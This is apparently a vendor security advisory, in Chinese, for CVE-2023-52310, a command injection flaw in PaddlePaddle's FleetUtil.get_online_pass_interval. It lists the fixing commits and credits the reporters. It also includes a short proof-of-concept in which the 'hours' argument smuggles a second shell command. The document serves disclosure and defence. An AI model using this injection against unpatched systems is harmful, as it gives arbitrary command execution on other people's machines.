CVE-2023-52310
get_online_pass_interval存在命令注入漏洞,可造成任意命令执行,PoC代码如下:
from paddle.incubate.distributed.fleet.fleet_util import FleetUtil
fleet_util = FleetUtil()
online_pass_interval = fleet_util.get_online_pass_interval(
days="{20190720..20190729}",
hours="9;touch /home/test/aaaa",
split_interval=5,
split_per_pass=2,
is_data_hourly_placed=False
)我们在commits 1aae481dfd7d2055c801563e254f1484b974b68e、c62d87eb91c84154af40946f17205d86f608866b 和 f8560c903c80450e37b8f304a9cd8207678f2f83 中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。
请参考我们的安全指南以获得更多关于安全的信息,以及如何与我们联系问题。
此漏洞由 huntr.com 和 leeya_bug 提交。